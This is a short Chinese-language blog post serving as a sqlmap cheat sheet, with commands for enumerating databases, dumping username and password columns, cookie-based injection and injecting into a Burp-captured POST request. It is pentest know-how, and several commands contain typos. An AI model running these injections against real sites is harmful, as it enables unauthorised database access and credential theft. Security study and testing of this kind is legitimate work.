一款强大的注入工具——sqlmap
SQLMAP实用工具
一说到注入我第一时间想起的就是Sqlmap,下面一起看一下。(第一次发,我好忐忑…)
sqlmap 的一些基本参数
Sqlmap --version 显示程序的版本号并退出
Sqlmap --help 显示帮助消息并退出
Sqlmap –update 更新升级
-u 指定 url 地址
-D 指定数据库名称
-T 指定表名称
-C 指定字段名称(多个字段用逗号隔开)
–dbs 列取所有数据库
–tables 列取所有表名
–columns 列出所有字段
–dump 暴数据
–current-db 显示当前数据库
–current-user 显示当前用户 (-users即是所有用户)
–privileges 显示当前用户权限
–passwords 数据库账户与密码
-D 库名 –tables 指定库名列出所有表
-D 库名 -T 表名 –columns 指定库名表名列出所有字段
指定库名,表名,字段,dump出指定字段
-D 库名 -T 表名 -C 所指定的字段 –dump或者
-D 库名 -T 表名 -C ”指定字段” –dump(可以加双引号,也可以不加双引号)
延时注入
sqlmap.py -u URL –technique -T –current-user
sqlmap cookies注入
可以通过burpsuite等工具获取当前的cookie值,然后进行注入:
sqlmap.py -u 注入点URL --cookie"id=xxx" --level 3
sqlmap.py -u url --cookie “id=xxx”–level 3 --tables(猜解表名)
sqlmap.py -u url --cookie “id=xxx”–level 3 -T 表名 --coiumns
sqlmap.py -u url --cookie “id=xxx”–level 3 -T 表名 -C username,password --dump
sqlmap配合burpsuite进行注入
配合burpsuite来使用sqlmap:
1, 浏览器打开目标地址
2, 配置burp代理(127.0.0.1 端口号:8080)拦截请求
3, 点击登录表单的submit按钮
4, Burp会拦截到我们的登录POST请求
5, 把这个post请求复制为txt, 然后把它放到sqlmap目录下
6, 运行sqlmap并使用如下命令:sqlmap.py -r post.txt -p tfUPass
以上是我在闲暇时间查找,翻阅资料整合所写,——如有侵权,请联系博主删除。